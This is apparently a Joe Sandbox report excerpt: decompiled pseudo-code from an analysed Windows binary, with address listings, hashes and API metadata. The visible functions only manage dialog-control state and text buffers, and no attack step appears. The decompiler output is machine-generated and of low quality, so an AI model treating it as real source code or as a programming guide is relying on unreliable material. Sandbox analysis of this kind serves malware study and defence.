																		_t160 = _t227;
																		if(_t211 < 8) {
																			_t160 =  &_v1088;
																		}
																		if(_t160 > _t244) {
																			L59:
																			E0041AD33();
																			goto L60;
																		} else {
																			_t176 = _t227;
																			if(_t211 < 8) {
																				_t176 =  &_v1088;
																			}
																			if(_t244 <= _t176 + _t192 * 2) {
																				L60:
																				_t164 = E004083A0( &_v1100,  &_v1092, _t244, _t252, _t234,  &_v1108);
																				_t235 =  *_t164;
																				_t253 =  *((intOrPtr*)(_t164 + 4));
																				_t165 = _v1068;
																				_t193 = _v1088;
																				_t256 = _t256 + 0x18;
																				_t212 = _t193;
																				if(_t165 < 8) {
																					_t212 =  &_v1088;
																				}
																				_t229 = _v1072;
																				_t245 = _t212 + _t229 * 2;
																				if(_t245 == 0) {
																					L69:
																					E0041AD33();
																					goto L70;
																				} else {
																					_t214 = _t193;
																					if(_t165 < 8) {
																						_t214 =  &_v1088;
																					}
																					if(_t214 > _t245) {
																						goto L69;
																					} else {
																						_t175 = _t193;
																						if(_t165 < 8) {
																							_t175 =  &_v1088;
																						}
																						if(_t245 <= _t175 + _t229 * 2) {
																							L70:
																							_t225 =  &_v1100;
																							E004081D0( &_v1092, _t253,  &_v1100, _t235, _t253,  &_v1092, _t245);
																							_t246 =  *((intOrPtr*)(_v1124 + 0x800));
																							_t189 = _t193 & 0xffffff00 | _v1092 != 0x00000000;
																							_t171 =  *((intOrPtr*)(E00404510() + 0x70));
																							if(_t171 == 0) {
																								_t247 = 0;
																								__eflags = 0;
																							} else {
																								_t174 =  *_t171(_t246, 0x3f8);
																								_t256 = _t256 + 8;
																								_t247 = _t174;
																							}
																							_t232 = _t189 & 0x000000ff;
																							if(_t232 != IsWindowEnabled(_t247)) {
																								 *0x43baa4(_t247, _t232);
																							}
																							L77:
																							_t242 =  *((intOrPtr*)(_v1092 + 0x800));
																							_t146 =  *((intOrPtr*)(E00404510() + 0x70));
																							if(_t146 == 0) {
																								_t147 = 0;
																								__eflags = 0;
																							} else {
																								_t147 =  *_t146(_t242, 1);
																								_t256 = _t256 + 8;
																							}
																							if(_v1098 == 0 || _t189 == 0) {
																								_t203 = 0;
																								__eflags = 0;
																							} else {
																								_t203 = 1;
																							}
																							 *0x43baa4(_t147, _t203);
																							if(_v1106 == 0 || _t189 == 0) {
																								_t190 = 0;
																								__eflags = 0;
																							} else {
																								_t190 = 1;
																							}
																							_t309 = _v1064 - 8;
																							if(_v1064 >= 8) {
																								_t225 = _v1084;
																								_push(_v1084);
																								L0041A97D(_t190, _t232, _t242, _t309);
																								_t256 = _t256 + 4;
																							}
																							 *[fs:0x0] = _v32;
																							_pop(_t233);
																							_pop(_t243);
																							_pop(_t191);
																							return E0041B3F9(_t190, _t191, _v36 ^ _t256, _t225, _t233, _t243);
																						} else {
																							goto L69;
																						}
																					}
																				}
																			} else {
																				goto L59;
																			}
																		}
																	}
																	_t244 = _t227;
																	if(_t227 == 0) {
																		goto L59;
																	}
																	goto L53;
																} else {
																	goto L50;
																}
															}
														}
													}
												} else {
													goto L33;
												}
											}
										}
									} else {
										goto L23;
									}
								}
							}
							_t238 = _t221;
							if(_t221 == 0) {
								goto L23;
							}
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}












































































































                                                                                                                              0x00408510
                                                                                                                              0x00408512
                                                                                                                              0x0040851d
                                                                                                                              0x0040851e
                                                                                                                              0x00408524
                                                                                                                              0x0040852b
                                                                                                                              0x00408532
                                                                                                                              0x00408536
                                                                                                                              0x0040853d
                                                                                                                              0x00408545
                                                                                                                              0x0040854b
                                                                                                                              0x00408551
                                                                                                                              0x00408555
                                                                                                                              0x0040855f
                                                                                                                              0x00408566
                                                                                                                              0x00408575
                                                                                                                              0x00408575
                                                                                                                              0x00408568
                                                                                                                              0x0040856e
                                                                                                                              0x00408570
                                                                                                                              0x00408570
                                                                                                                              0x00408582
                                                                                                                              0x00408588
                                                                                                                              0x0040858c
                                                                                                                              0x00408594
                                                                                                                              0x00408598
                                                                                                                              0x0040859d
                                                                                                                              0x004085a0
                                                                                                                              0x004085a0
                                                                                                                              0x004085a3
                                                                                                                              0x004085a6
                                                                                                                              0x004085b9
                                                                                                                              0x004085be
                                                                                                                              0x004085c5
                                                                                                                              0x004085c9
                                                                                                                              0x004085d0
                                                                                                                              0x004085d8
                                                                                                                              0x004085da
                                                                                                                              0x004085dc
                                                                                                                              0x004085dc
                                                                                                                              0x004085e0
                                                                                                                              0x004085e4
                                                                                                                              0x004085e9
                                                                                                                              0x0040860c
                                                                                                                              0x0040860c
                                                                                                                              0x00408611
                                                                                                                              0x00408615
                                                                                                                              0x00408619
                                                                                                                              0x00000000
                                                                                                                              0x004085eb
                                                                                                                              0x004085ee
                                                                                                                              0x004085f0
                                                                                                                              0x004085f2
                                                                                                                              0x004085f2
                                                                                                                              0x004085f8
                                                                                                                              0x00000000
                                                                                                                              0x004085fa
                                                                                                                              0x004085fd
                                                                                                                              0x004085ff
                                                                                                                              0x00408601
                                                                                                                              0x00408601
                                                                                                                              0x0040860a
                                                                                                                              0x0040861d
                                                                                                                              0x00408620
                                                                                                                              0x00408624
                                                                                                                              0x00408701
                                                                                                                              0x00408630
                                                                                                                              0x00408633
                                                                                                                              0x00408635
                                                                                                                              0x00408637
                                                                                                                              0x00408637
                                                                                                                              0x0040863d
                                                                                                                              0x00408651
                                                                                                                              0x00408651
                                                                                                                              0x00000000
                                                                                                                              0x0040863f
                                                                                                                              0x00408642
                                                                                                                              0x00408644
                                                                                                                              0x00408646
                                                                                                                              0x00408646
                                                                                                                              0x0040864f
                                                                                                                              0x00408656
                                                                                                                              0x00408668
                                                                                                                              0x0040866d
                                                                                                                              0x00408671
                                                                                                                              0x00408675
                                                                                                                              0x0040867b
                                                                                                                              0x0040867d
                                                                                                                              0x0040867f
                                                                                                                              0x0040867f
                                                                                                                              0x00408683
                                                                                                                              0x00408687
                                                                                                                              0x0040868c
                                                                                                                              0x004086af
                                                                                                                              0x004086af
                                                                                                                              0x00000000
                                                                                                                              0x0040868e
                                                                                                                              0x00408691
                                                                                                                              0x00408693
                                                                                                                              0x00408695
                                                                                                                              0x00408695
                                                                                                                              0x0040869b
                                                                                                                              0x00000000
                                                                                                                              0x0040869d
                                                                                                                              0x004086a0
                                                                                                                              0x004086a2
                                                                                                                              0x004086a4
                                                                                                                              0x004086a4
                                                                                                                              0x004086ad
                                                                                                                              0x004086b4
                                                                                                                              0x004086cd
                                                                                                                              0x004086d7
                                                                                                                              0x004086db
                                                                                                                              0x004086e1
                                                                                                                              0x004086eb
                                                                                                                              0x004086f0
                                                                                                                              0x0040870a
                                                                                                                              0x0040870a
                                                                                                                              0x004086f2
                                                                                                                              0x004086f8
                                                                                                                              0x004086fa
                                                                                                                              0x004086fd
                                                                                                                              0x004086fd
                                                                                                                              0x00408715
                                                                                                                              0x004088b9
                                                                                                                              0x00000000
                                                                                                                              0x0040871b
                                                                                                                              0x00408729
                                                                                                                              0x0040872f
                                                                                                                              0x00408736
                                                                                                                              0x00408740
                                                                                                                              0x00408740
                                                                                                                              0x00408743
                                                                                                                              0x00408746
                                                                                                                              0x0040875c
                                                                                                                              0x00408761
                                                                                                                              0x00408768
                                                                                                                              0x0040876c
                                                                                                                              0x00408774
                                                                                                                              0x00408776
                                                                                                                              0x00408778
                                                                                                                              0x00408778
                                                                                                                              0x0040877c
                                                                                                                              0x00408780
                                                                                                                              0x00408785
                                                                                                                              0x004087a8
                                                                                                                              0x004087a8
                                                                                                                              0x004087ad
                                                                                                                              0x004087b1
                                                                                                                              0x004087b5
                                                                                                                              0x00000000
                                                                                                                              0x00408787
                                                                                                                              0x0040878a
                                                                                                                              0x0040878c
                                                                                                                              0x0040878e
                                                                                                                              0x0040878e
                                                                                                                              0x00408794
                                                                                                                              0x00000000
                                                                                                                              0x00408796
                                                                                                                              0x00408799
                                                                                                                              0x0040879b
                                                                                                                              0x0040879d
                                                                                                                              0x0040879d
                                                                                                                              0x004087a6
                                                                                                                              0x004087b9
                                                                                                                              0x004087bc
                                                                                                                              0x004087c0
                                                                                                                              0x00408896
                                                                                                                              0x004087cc
                                                                                                                              0x004087cf
                                                                                                                              0x004087d1
                                                                                                                              0x004087d3
                                                                                                                              0x004087d3
                                                                                                                              0x004087d9
                                                                                                                              0x004087ed
                                                                                                                              0x004087ed
                                                                                                                              0x00000000
                                                                                                                              0x004087db
                                                                                                                              0x004087de
                                                                                                                              0x004087e0
                                                                                                                              0x004087e2
                                                                                                                              0x004087e2
                                                                                                                              0x004087eb
                                                                                                                              0x004087f2
                                                                                                                              0x00408804
                                                                                                                              0x00408809
                                                                                                                              0x0040880b
                                                                                                                              0x0040880e
                                                                                                                              0x00408812
                                                                                                                              0x00408816
                                                                                                                              0x0040881c
                                                                                                                              0x0040881e
                                                                                                                              0x00408820
                                                                                                                              0x00408820
                                                                                                                              0x00408824
                                                                                                                              0x00408828
                                                                                                                              0x0040882d
                                                                                                                              0x00408850
                                                                                                                              0x00408850
                                                                                                                              0x00000000
                                                                                                                              0x0040882f
                                                                                                                              0x00408832
                                                                                                                              0x00408834
                                                                                                                              0x00408836
                                                                                                                              0x00408836
                                                                                                                              0x0040883c
                                                                                                                              0x00000000
                                                                                                                              0x0040883e
                                                                                                                              0x00408841
                                                                                                                              0x00408843
                                                                                                                              0x00408845
                                                                                                                              0x00408845
                                                                                                                              0x0040884e
                                                                                                                              0x00408855
                                                                                                                              0x0040885d
                                                                                                                              0x00408864
                                                                                                                              0x00408872
                                                                                                                              0x00408878
                                                                                                                              0x00408880
                                                                                                                              0x00408885
                                                                                                                              0x0040889f
                                                                                                                              0x0040889f
                                                                                                                              0x00408887
                                                                                                                              0x0040888d
                                                                                                                              0x0040888f
                                                                                                                              0x00408892
                                                                                                                              0x00408892
                                                                                                                              0x004088a2
                                                                                                                              0x004088ad
                                                                                                                              0x004088b1
                                                                                                                              0x004088b1
                                                                                                                              0x004088bd
                                                                                                                              0x004088c1
                                                                                                                              0x004088cc
                                                                                                                              0x004088d1
                                                                                                                              0x004088dd
                                                                                                                              0x004088dd
                                                                                                                              0x004088d3
                                                                                                                              0x004088d6
                                                                                                                              0x004088d8
                                                                                                                              0x004088d8
                                                                                                                              0x004088e4
                                                                                                                              0x004088f1
                                                                                                                              0x004088f1
                                                                                                                              0x004088ea
                                                                                                                              0x004088ea
                                                                                                                              0x004088ea
                                                                                                                              0x004088f5
                                                                                                                              0x00408900
                                                                                                                              0x0040890a
                                                                                                                              0x0040890a
                                                                                                                              0x00408906
                                                                                                                              0x00408906
                                                                                                                              0x00408906
                                                                                                                              0x0040890c
                                                                                                                              0x00408911
                                                                                                                              0x00408913
                                                                                                                              0x00408917
                                                                                                                              0x00408918
                                                                                                                              0x0040891d
                                                                                                                              0x0040891d
                                                                                                                              0x00408929
                                                                                                                              0x00408931
                                                                                                                              0x00408932
                                                                                                                              0x00408934
                                                                                                                              0x00408949
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040884e
                                                                                                                              0x0040883c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004087eb
                                                                                                                              0x004087d9
                                                                                                                              0x004087c8
                                                                                                                              0x004087ca
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004087a6
                                                                                                                              0x00408794
                                                                                                                              0x00408785
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004086ad
                                                                                                                              0x0040869b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040864f
                                                                                                                              0x0040863d
                                                                                                                              0x0040862c
                                                                                                                              0x0040862e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040860a
                                                                                                                              0x004085f8

                                                                                                                              APIs
                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 0040870D
                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 004088A5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EnabledWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1255321416-3916222277
                                                                                                                              • Opcode ID: 4dfcb68cb1d0da54f9b26b674653201aa5c3891551a1080013439d044da17ab8
                                                                                                                              • Instruction ID: eed0029ecd35c9651f9ddc42da4dbeeb32840c0048c5cefc91c65c30df9c325e
                                                                                                                              • Opcode Fuzzy Hash: 4dfcb68cb1d0da54f9b26b674653201aa5c3891551a1080013439d044da17ab8
                                                                                                                              • Instruction Fuzzy Hash: 9CD1A2715082019FC714EB10CE80AAFB7E5EFC5304F94493EF595A7291EF38EA458B9A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040CE80 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 232COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 16%
                                                                                                                              			E0040CE80(intOrPtr __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				signed int _v172;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				signed int _v208;
				intOrPtr _v212;
				signed int _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				char _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v332;
				intOrPtr _v344;
				void* __ebp;
				void* _t96;
				void* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				intOrPtr* _t117;
				void* _t120;
				intOrPtr* _t124;
				void* _t125;
				void* _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				void* _t136;
				intOrPtr* _t137;
				intOrPtr* _t139;
				intOrPtr* _t141;
				signed int _t144;
				intOrPtr _t147;
				intOrPtr* _t148;
				intOrPtr _t150;
				void* _t152;

				_t144 = __edx;
				_t150 = _a4;
				_t147 = __ecx;
				 *((intOrPtr*)(__ecx + 0x800)) = _t150;
				E0041B7A1(__ecx, 0x30, 0x400);
				_t152 =  &_v300 + 0xc;
				_t96 = E00404510();
				_t139 =  *((intOrPtr*)(_t96 + 8));
				if(_t139 != 0) {
					 *_t139( *((intOrPtr*)(_t96 + 0xbc)), 0x80, _t147, 0x400);
					_t152 = _t152 + 0x10;
				}
				 *0x43babc(_t150, 0xc, 0, _t147);
				_t145 = _t144 | 0xffffffff;
				_v296 = 0x1350000;
				_v260 = 0x1350000;
				_v304 = 0x3ff;
				_v300 = 1;
				_v292 = 0;
				_v288 = 0;
				_v284 = 0;
				_v280 = 0;
				_v276 = 0;
				_v272 = 0;
				_v268 = 0x3fe;
				_v264 = 1;
				_v256 = 0;
				_v252 = 0;
				_v248 = 0;
				_v244 = 0;
				_v240 = 0;
				_v236 = 0;
				_v232 = 0x405;
				_v228 = 3;
				_v224 = 0x840007;
				_v220 = 1;
				_v216 = _t145;
				_v212 = 0x66;
				_v208 = _t145;
				_v204 = 0;
				_v200 = 0;
				_v196 = 0x408;
				_v192 = 3;
				_v188 = 0x440007;
				_v184 = 1;
				_v180 = _t145;
				_v176 = 0x68;
				_v172 = _t145;
				_v168 = 0;
				_v164 = 0;
				_v160 = 0x402;
				_v156 = 3;
				_v152 = 0x440007;
				_v148 = 0;
				_v144 = 0;
				_v140 = 0;
				_v136 = 0;
				_v132 = 0;
				_v128 = 0;
				_v124 = 0x401;
				_v120 = 3;
				_v116 = 0x440007;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_v88 = 2;
				_v84 = 3;
				_v80 = 0x440007;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0x409;
				_v48 = 3;
				_v44 = 0x440007;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_t100 = E00404510();
				_t141 =  *((intOrPtr*)(_t100 + 0x6c));
				if(_t141 != 0) {
					_t145 =  &_v304;
					 *_t141( *((intOrPtr*)(_t100 + 0xbc)), _t150,  &_v304, 8);
					_t152 = _t152 + 0x10;
				}
				_t102 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t102 == 0) {
					_v312 = 0;
				} else {
					_t130 =  *_t102(_t150, 0x406);
					_t152 = _t152 + 8;
					_v312 = _t130;
				}
				_t104 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t104 == 0) {
					_v316 = 0;
				} else {
					_t129 =  *_t104(_t150, 0x404);
					_t152 = _t152 + 8;
					_v316 = _t129;
				}
				_t106 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t106 == 0) {
					_v308 = 0;
				} else {
					_t128 =  *_t106(_t150, 0x405);
					_t152 = _t152 + 8;
					_v308 = _t128;
				}
				_t108 =  *((intOrPtr*)(E00404510() + 0x70));
				_t160 = _t108;
				if(_t108 == 0) {
					_t136 = 0;
					__eflags = 0;
				} else {
					_t127 =  *_t108(_t150, 0x408);
					_t152 = _t152 + 8;
					_t136 = _t127;
				}
				 *0x43baa4(_v308, 0);
				_t137 =  *0x43baa4; // 0x418f9c
				 *_t137(_t136, 0);
				E0040CA90(_t147, _t145, _t160);
				_t148 =  *0x43babc; // 0x418f08
				_push(0);
				_push(0);
				_push(0x1105);
				_push(_v332);
				if( *_t148() == 0) {
					_t124 =  *((intOrPtr*)(E00404510() + 0x70));
					if(_t124 == 0) {
						_t125 = 0;
						__eflags = 0;
					} else {
						_t125 =  *_t124(_t150, 0x402);
						_t152 = _t152 + 8;
					}
					 *_t137(_t125, 0);
				}
				_push(0);
				_push(0);
				_push(0x1105);
				_push(_v344);
				if( *_t148() != 0) {
					L25:
					return 1;
				} else {
					_t117 =  *((intOrPtr*)(E00404510() + 0x70));
					if(_t117 == 0) {
						__eflags = 0;
						 *_t137(0, 0);
						goto L25;
					} else {
						_t120 =  *_t117(_t150, 0x401);
						 *_t137(_t120, 0);
						return 1;
					}
				}
			}








































































































                                                                                                                              0x0040ce80
                                                                                                                              0x0040ce88
                                                                                                                              0x0040ce96
                                                                                                                              0x0040ce9b
                                                                                                                              0x0040cea1
                                                                                                                              0x0040cea6
                                                                                                                              0x0040cea9
                                                                                                                              0x0040ceae
                                                                                                                              0x0040ceb5
                                                                                                                              0x0040cec9
                                                                                                                              0x0040cecb
                                                                                                                              0x0040cecb
                                                                                                                              0x0040ced3
                                                                                                                              0x0040cee8
                                                                                                                              0x0040ceeb
                                                                                                                              0x0040ceef
                                                                                                                              0x0040cef8
                                                                                                                              0x0040cf00
                                                                                                                              0x0040cf04
                                                                                                                              0x0040cf08
                                                                                                                              0x0040cf0c
                                                                                                                              0x0040cf10
                                                                                                                              0x0040cf14
                                                                                                                              0x0040cf18
                                                                                                                              0x0040cf1c
                                                                                                                              0x0040cf24
                                                                                                                              0x0040cf28
                                                                                                                              0x0040cf2c
                                                                                                                              0x0040cf30
                                                                                                                              0x0040cf34
                                                                                                                              0x0040cf38
                                                                                                                              0x0040cf3c
                                                                                                                              0x0040cf40
                                                                                                                              0x0040cf48
                                                                                                                              0x0040cf4c
                                                                                                                              0x0040cf54
                                                                                                                              0x0040cf58
                                                                                                                              0x0040cf5c
                                                                                                                              0x0040cf64
                                                                                                                              0x0040cf68
                                                                                                                              0x0040cf6f
                                                                                                                              0x0040cf76
                                                                                                                              0x0040cf81
                                                                                                                              0x0040cf88
                                                                                                                              0x0040cf8f
                                                                                                                              0x0040cf96
                                                                                                                              0x0040cf9d
                                                                                                                              0x0040cfa8
                                                                                                                              0x0040cfaf
                                                                                                                              0x0040cfb6
                                                                                                                              0x0040cfbd
                                                                                                                              0x0040cfc8
                                                                                                                              0x0040cfcf
                                                                                                                              0x0040cfd6
                                                                                                                              0x0040cfdd
                                                                                                                              0x0040cfe4
                                                                                                                              0x0040cfeb
                                                                                                                              0x0040cff2
                                                                                                                              0x0040cff9
                                                                                                                              0x0040d000
                                                                                                                              0x0040d00b
                                                                                                                              0x0040d012
                                                                                                                              0x0040d019
                                                                                                                              0x0040d020
                                                                                                                              0x0040d027
                                                                                                                              0x0040d02e
                                                                                                                              0x0040d035
                                                                                                                              0x0040d03c
                                                                                                                              0x0040d043
                                                                                                                              0x0040d04e
                                                                                                                              0x0040d055
                                                                                                                              0x0040d05c
                                                                                                                              0x0040d063
                                                                                                                              0x0040d06a
                                                                                                                              0x0040d071
                                                                                                                              0x0040d078
                                                                                                                              0x0040d07f
                                                                                                                              0x0040d086
                                                                                                                              0x0040d091
                                                                                                                              0x0040d098
                                                                                                                              0x0040d09f
                                                                                                                              0x0040d0a6
                                                                                                                              0x0040d0ad
                                                                                                                              0x0040d0b4
                                                                                                                              0x0040d0bb
                                                                                                                              0x0040d0c2
                                                                                                                              0x0040d0c9
                                                                                                                              0x0040d0ce
                                                                                                                              0x0040d0d3
                                                                                                                              0x0040d0dd
                                                                                                                              0x0040d0e4
                                                                                                                              0x0040d0e6
                                                                                                                              0x0040d0e6
                                                                                                                              0x0040d0ee
                                                                                                                              0x0040d0f3
                                                                                                                              0x0040d106
                                                                                                                              0x0040d0f5
                                                                                                                              0x0040d0fb
                                                                                                                              0x0040d0fd
                                                                                                                              0x0040d100
                                                                                                                              0x0040d100
                                                                                                                              0x0040d10f
                                                                                                                              0x0040d114
                                                                                                                              0x0040d127
                                                                                                                              0x0040d116
                                                                                                                              0x0040d11c
                                                                                                                              0x0040d11e
                                                                                                                              0x0040d121
                                                                                                                              0x0040d121
                                                                                                                              0x0040d130
                                                                                                                              0x0040d135
                                                                                                                              0x0040d148
                                                                                                                              0x0040d137
                                                                                                                              0x0040d13d
                                                                                                                              0x0040d13f
                                                                                                                              0x0040d142
                                                                                                                              0x0040d142
                                                                                                                              0x0040d151
                                                                                                                              0x0040d154
                                                                                                                              0x0040d156
                                                                                                                              0x0040d167
                                                                                                                              0x0040d167
                                                                                                                              0x0040d158
                                                                                                                              0x0040d15e
                                                                                                                              0x0040d160
                                                                                                                              0x0040d163
                                                                                                                              0x0040d163
                                                                                                                              0x0040d16f
                                                                                                                              0x0040d177
                                                                                                                              0x0040d17d
                                                                                                                              0x0040d181
                                                                                                                              0x0040d18a
                                                                                                                              0x0040d190
                                                                                                                              0x0040d191
                                                                                                                              0x0040d192
                                                                                                                              0x0040d197
                                                                                                                              0x0040d19c
                                                                                                                              0x0040d1a3
                                                                                                                              0x0040d1a8
                                                                                                                              0x0040d1b7
                                                                                                                              0x0040d1b7
                                                                                                                              0x0040d1aa
                                                                                                                              0x0040d1b0
                                                                                                                              0x0040d1b2
                                                                                                                              0x0040d1b2
                                                                                                                              0x0040d1bb
                                                                                                                              0x0040d1bb
                                                                                                                              0x0040d1c1
                                                                                                                              0x0040d1c2
                                                                                                                              0x0040d1c3
                                                                                                                              0x0040d1c8
                                                                                                                              0x0040d1cd
                                                                                                                              0x0040d202
                                                                                                                              0x0040d20b
                                                                                                                              0x0040d1cf
                                                                                                                              0x0040d1d4
                                                                                                                              0x0040d1d9
                                                                                                                              0x0040d1f9
                                                                                                                              0x0040d1fd
                                                                                                                              0x00000000
                                                                                                                              0x0040d1db
                                                                                                                              0x0040d1e1
                                                                                                                              0x0040d1e8
                                                                                                                              0x0040d1f6
                                                                                                                              0x0040d1f6
                                                                                                                              0x0040d1d9

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __wcsnset
                                                                                                                              • String ID: f$h
                                                                                                                              • API String ID: 479530707-26895948
                                                                                                                              • Opcode ID: 22014926fb1172f0a014ddde8e4d686faed7c4c790cce329bc4afd9cf1c076ec
                                                                                                                              • Instruction ID: 93c379db9926c11454331938cb07858ba3c5a0d42984c357cada24ffa647b631
                                                                                                                              • Opcode Fuzzy Hash: 22014926fb1172f0a014ddde8e4d686faed7c4c790cce329bc4afd9cf1c076ec
                                                                                                                              • Instruction Fuzzy Hash: 379118B09193509FD360DF599841B9FBAE8FF88B04F00492FF29897291D7B884458FA6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040DAB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 210COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 48%
                                                                                                                              			E0040DAB0(intOrPtr __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t66;
				signed int _t68;
				intOrPtr* _t72;
				struct HWND__* _t73;
				intOrPtr* _t75;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t86;
				intOrPtr* _t92;
				intOrPtr* _t94;
				struct HWND__* _t99;
				struct HWND__* _t100;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t105;
				signed int _t109;
				signed char _t110;
				void* _t111;
				intOrPtr _t112;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t127;
				intOrPtr _t129;
				signed int _t131;
				void* _t134;
				intOrPtr _t135;
				struct HWND__* _t136;
				intOrPtr _t137;
				intOrPtr _t139;
				intOrPtr _t140;
				void* _t141;
				intOrPtr _t142;
				intOrPtr _t143;
				signed int _t144;
				intOrPtr _t145;
				signed int _t147;
				intOrPtr _t148;
				struct HWND__* _t149;
				void* _t151;
				signed int _t152;
				signed int _t153;

				_push(0xffffffff);
				_push(E0043085B);
				_push( *[fs:0x0]);
				_t152 = _t151 - 0x230;
				_t66 =  *0x43a6a8; // 0x2a5cd135
				 *(_t152 + 0x22c) = _t66 ^ _t152;
				_t68 =  *0x43a6a8; // 0x2a5cd135
				_push(_t68 ^ _t152);
				 *[fs:0x0] = _t152 + 0x244;
				_t139 =  *((intOrPtr*)(__ecx + 0x800));
				 *((intOrPtr*)(_t152 + 0x20)) = __ecx;
				_t72 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t72 == 0) {
					_t73 = 0;
					__eflags = 0;
				} else {
					_t73 =  *_t72(_t139, 0x3ee);
					_t152 = _t152 + 8;
				}
				 *0x43bab0(_t73, _t152 + 0x44, 0x100);
				_t75 = _t152 + 0x40;
				 *((intOrPtr*)(_t152 + 0x3c)) = 7;
				 *(_t152 + 0x38) = 0;
				 *((short*)(_t152 + 0x28)) = 0;
				_t127 = _t75 + 2;
				do {
					_t115 =  *_t75;
					_t75 = _t75 + 2;
				} while (_t115 != 0);
